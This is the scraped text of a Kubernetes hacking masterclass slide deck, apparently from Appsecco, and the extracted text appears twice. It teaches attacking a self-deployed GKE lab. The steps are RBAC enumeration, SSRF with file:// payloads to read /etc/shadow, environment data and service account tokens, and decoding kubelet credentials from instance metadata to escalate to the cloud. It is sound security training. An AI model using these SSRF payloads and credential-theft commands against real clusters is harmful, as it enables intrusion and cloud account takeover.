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Appsecco Case Studies
2022 mid-year
Some of our work so far in 2022
15th Dec 2023
What will
we do
1. Deploy a GKE cluster in our own accounts
and setup some misconfigurations to exploit
2. Talk about some relevant Kubernetes controls
for today's masterclass
3. Attack our own setup to exploit RBAC and pod
level access to compromise the cluster
4. Q&A
o use the Q&A and chat feature, send your
questions etc. I will comment/answer as and
when I see them.
Let's deploy our
(Lab setup)
Download the following file and open it in a text editor.
Login to Google Cloud Console and in the same browser open a
Google CloudShell in a new tab. Make sure your project is selected
for CloudShell.
Make sure you run the commands from the Google CloudShell
1. Run the commands from commands.txt to create your cluster. Read the
comments to understand what the commands are doing.
2. Note the IP address printed at the end of the command
Security Controls
Kubernetes, and depending on the cloud platform it is run on top of, has
multiple security features and controls built into the environment.
• As hackers we rely on these to be misconfigured or absent :)
We will look at 2 main security/concepts in Kubernetes, relevant to our class
1. Pod Security Admission
2. Role Based Access Control
1. Let's create 2 namespaces each with a different Pod Security Standard
2. Go to the `~/masterclass/pod-admission-controller-lab` folder
and run these commands to create new namespaces
o kubectl apply -f restricted-namespace.yaml
o kubectl apply -f privileged-namespace.yaml
3. Now attempt to start a privileged pod within each of the namespaces
o kubectl get ns
o kubectl apply -f nginx-privileged.yaml -n privileged-namespace
o kubectl apply -f nginx-privileged.yaml -n restricted-namespace
4. What do you see?
Pod Admission Controller – In simple terms
• This is code that intercepts requests reaching the API server to verify if
the object (pod, namespace etc.) create request passes a list of allowed
checks or not.
o The list of checks the request is compared against are called the Pod
Security Standards
o There are 3 standards - privileged, baseline, and restricted
Let's enumerate what roles and clusterroles are present in this cluster
and how they are bound
1. Enumerate roles within the kube-system namespace
o kubectl get roles -n kube-system
o kubectl get rolebindings -n kube-system
2. For each of the rolebindings enumerate the subject attached
o kubectl get rolebindings <BINDING_NAME> -n kube-system
3. Test the privileges of the discovered service account using
o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud-
provider --list
Let's repeat the same but with clusterroles and clusterrolebindings to
see cluster wide RBAC
1. Enumerate clusterroles across the cluster
o kubectl get clusterroles
o kubectl get clusterrolebindings
2. For the clusterrolebindings that use a privileged clusterrole, enumerate
the subject attached
o kubectl get clusterrolebindings <BINDING_NAME>
3. Test the privileges of the discovered service account using
o kubectl auth can-i --as=system:serviceaccount:apps:default --list
Role and ClusterRole and Bindings
• An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions
are purely additive (there are no "deny" rules).
• A Role always sets permissions within a particular namespace;when you create a Role,you
have to specifythe namespace it belongs in.
• ClusterRole,is a non-namespaced resourceand applies to the entire cluster.
• Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service
accounts) with a roleRef pointing to the role which gives the subject the specific permissions
• If you want to define a role within a namespace,use a Role;if you want to define a role cluster-
wide, use a ClusterRole.
Abusing RBAC
privileges from
within pods
• All pods will have access to the default service account mounted as a file
system object within the pod at
o /var/run/secrets/
o /var/run/secrets/
• We can extract them and use them to interact with the cluster
o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes
So how do we gain access to this service account or files from the pod?
• Let's take a closer look at the app that was deployed
• Login to the application using username serveradmin and password
• What is the app's functionality?
• What vulnerability is present here?
• The application takes a URL from the user and makes a server side
request on the user's behalf
o Such a feature, if not protected properly is often vulnerable to Server Side
Request Forgeries (SSRF/XSPA)
• Depending on the request library used in the server side code, file:// is
also a valid request protocol and can be used to read local files!
• Try these as input
o file:///etc/passwd
o file:///etc/shadow
• Let's read the token and ca.crt so that we can interact with the cluster
using stolen credentials! Save these inside your Google CloudShell.
• Run kubectl with the token and ca.crt to gain access to the cluster using
the stolen secret of the service account
o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes
• Use auth plugin to view your current access with the stolen credentials
kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt -
Appsecco Kubernetes Hacking Masterclass Presentation Slides
Post Exploitation
in GKE
(Hands-On / Homework)
We can go a little further with our setup in this class. We have an app with SSRF
running inside a GKE cluster. You can perform the following additional actions
1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE
information etc.
• file:///proc/self/environ
2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials
3. Fetch the Google VM instance's compute service account's token and scope to query the
underlying cloud platform itself! This is escaping from the cluster to the cloud environment.
Env vars inside pod
kube-env from Instance Metadata
cat kube-env | grep ^TPM_BOOTSTRAP_CERT | awk
'{print $2}' | base64 -d > kubelet.crt
cat kube-env | grep ^TPM_BOOTSTRAP_KEY | awk
'{print $2}' | base64 -d > kubelet.key
cat kube-env | grep ^CA_CERT | awk '{print $2}'
| base64 -d > apiserver.crt
kubectl auth --client-certificate=kubelet.crt -
-client-key=kubelet.key --certificate-
authority=apiserver.crt --server=$KUBERNE
TES_API_SERVER can-i --list
Google Cloud Compute SA Token Stealing
Tear Down the Cluster
(to avoid credit wastage)
(optional, don't if you want to practice)
15. Hacking Kubernetes Clusters -
16. Kubernetes 101 -
17. Kubernetes Crash Course for Absolute Beginners -
• Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration
Testing as a Service at Appsecco
• Appsecco is a boutique security consulting company with
customers across the world.
• Over a decade and half experience with hacking web apps,
APIs, mobile, wireless, networks and more lately cloud and
• Love to teach! Speak and train at a bunch of conferences! | +91 9886042242 |
About Appsecco
Pragmatic, holistic, business-focused approach
Specialist Cloud and Application Security company
Highly experienced and diverse team
Assigned multiple CVEs
Certified hackers
OWASP chapter leads
Cloud and Kubernetes security experts
Black Hat & Def Con speakers

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Appsecco Kubernetes Hacking Masterclass Presentation Slides

  • 1. Appsecco Case Studies 2022 mid-year Some of our work so far in 2022 15th Dec 2023
  • 2. What will we do today? 1. Deploy a GKE cluster in our own accounts and setup some misconfigurations to exploit 2. Talk about some relevant Kubernetes controls for today's masterclass 3. Attack our own setup to exploit RBAC and pod level access to compromise the cluster 4. Q&A o use the Q&A and chat feature, send your questions etc. I will comment/answer as and when I see them.
  • 4. Download the following file and open it in a text editor. DO NOT RUN ANY COMMANDS YET! Login to Google Cloud Console and in the same browser open a Google CloudShell in a new tab. Make sure your project is selected for CloudShell.
  • 5. Make sure you run the commands from the Google CloudShell 1. Run the commands from commands.txt to create your cluster. Read the comments to understand what the commands are doing. 2. Note the IP address printed at the end of the command
  • 7. Kubernetes, and depending on the cloud platform it is run on top of, has multiple security features and controls built into the environment. • As hackers we rely on these to be misconfigured or absent :) We will look at 2 main security/concepts in Kubernetes, relevant to our class today 1. Pod Security Admission 2. Role Based Access Control
  • 8. 1. Let's create 2 namespaces each with a different Pod Security Standard 2. Go to the `~/masterclass/pod-admission-controller-lab` folder and run these commands to create new namespaces o kubectl apply -f restricted-namespace.yaml o kubectl apply -f privileged-namespace.yaml 3. Now attempt to start a privileged pod within each of the namespaces o kubectl get ns o kubectl apply -f nginx-privileged.yaml -n privileged-namespace o kubectl apply -f nginx-privileged.yaml -n restricted-namespace 4. What do you see?
  • 9. Pod Admission Controller – In simple terms • This is code that intercepts requests reaching the API server to verify if the object (pod, namespace etc.) create request passes a list of allowed checks or not. o The list of checks the request is compared against are called the Pod Security Standards o There are 3 standards - privileged, baseline, and restricted
  • 10. Let's enumerate what roles and clusterroles are present in this cluster and how they are bound 1. Enumerate roles within the kube-system namespace o kubectl get roles -n kube-system o kubectl get rolebindings -n kube-system 2. For each of the rolebindings enumerate the subject attached o kubectl get rolebindings <BINDING_NAME> -n kube-system 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:kube-system:cloud- provider --list
  • 11. Let's repeat the same but with clusterroles and clusterrolebindings to see cluster wide RBAC 1. Enumerate clusterroles across the cluster o kubectl get clusterroles o kubectl get clusterrolebindings 2. For the clusterrolebindings that use a privileged clusterrole, enumerate the subject attached o kubectl get clusterrolebindings <BINDING_NAME> 3. Test the privileges of the discovered service account using o kubectl auth can-i --as=system:serviceaccount:apps:default --list
  • 12. Role and ClusterRole and Bindings • An RBAC Role or ClusterRole contains rules that representa set of permissions.Permissions are purely additive (there are no "deny" rules). • A Role always sets permissions within a particular namespace;when you create a Role,you have to specifythe namespace it belongs in. • ClusterRole,is a non-namespaced resourceand applies to the entire cluster. • Bindings allow the Role or ClusterRole to be bound to a subject (users, groups,or service accounts) with a roleRef pointing to the role which gives the subject the specific permissions • If you want to define a role within a namespace,use a Role;if you want to define a role cluster- wide, use a ClusterRole.
  • 15. • All pods will have access to the default service account mounted as a file system object within the pod at o /var/run/secrets/ o /var/run/secrets/ • We can extract them and use them to interact with the cluster o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes So how do we gain access to this service account or files from the pod?
  • 16. • Let's take a closer look at the app that was deployed • Login to the application using username serveradmin and password monitorworld • What is the app's functionality? • What vulnerability is present here?
  • 17. • The application takes a URL from the user and makes a server side request on the user's behalf o Such a feature, if not protected properly is often vulnerable to Server Side Request Forgeries (SSRF/XSPA) • Depending on the request library used in the server side code, file:// is also a valid request protocol and can be used to read local files! • Try these as input o file:///etc/passwd o file:///etc/shadow
  • 18. • Let's read the token and ca.crt so that we can interact with the cluster using stolen credentials! Save these inside your Google CloudShell. file:///var/run/secrets/ file:///var/run/secrets/ • Run kubectl with the token and ca.crt to gain access to the cluster using the stolen secret of the service account o kubectl --token=`cat token` --certificate-authority=ca.crt get nodes • Use auth plugin to view your current access with the stolen credentials kubectl auth can-i --token=`cat token` --certificate-authority=ca.crt - -list
  • 21. We can go a little further with our setup in this class. We have an app with SSRF running inside a GKE cluster. You can perform the following additional actions 1. Dump env data. This will reveal env variables that can have secrets,Kubernetes/GKE information etc. • file:///proc/self/environ 2. Read the node Instance Metadata using the SSRF to fetchthe kubelet credentials • 3. Fetch the Google VM instance's compute service account's token and scope to query the underlying cloud platform itself! This is escaping from the cluster to the cloud environment. • • •
  • 23. kube-env from Instance Metadata cat kube-env | grep ^TPM_BOOTSTRAP_CERT | awk '{print $2}' | base64 -d > kubelet.crt cat kube-env | grep ^TPM_BOOTSTRAP_KEY | awk '{print $2}' | base64 -d > kubelet.key cat kube-env | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt kubectl auth --client-certificate=kubelet.crt - -client-key=kubelet.key --certificate- authority=apiserver.crt --server=$KUBERNE TES_API_SERVER can-i --list
  • 24. Google Cloud Compute SA Token Stealing
  • 25. Tear Down the Cluster (to avoid credit wastage) (optional, don't if you want to practice)
  • 26. 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. Hacking Kubernetes Clusters - 16. Kubernetes 101 - 17. Kubernetes Crash Course for Absolute Beginners -
  • 27. Q&A
  • 28. • Riyaz Walikar, Chief Hacker, run the Kubernetes Penetration Testing as a Service at Appsecco • Appsecco is a boutique security consulting company with customers across the world. • Over a decade and half experience with hacking web apps, APIs, mobile, wireless, networks and more lately cloud and containers • Love to teach! Speak and train at a bunch of conferences! | +91 9886042242 |
  • 29. About Appsecco Pragmatic, holistic, business-focused approach Specialist Cloud and Application Security company Highly experienced and diverse team Assigned multiple CVEs Certified hackers OWASP chapter leads Cloud and Kubernetes security experts Black Hat & Def Con speakers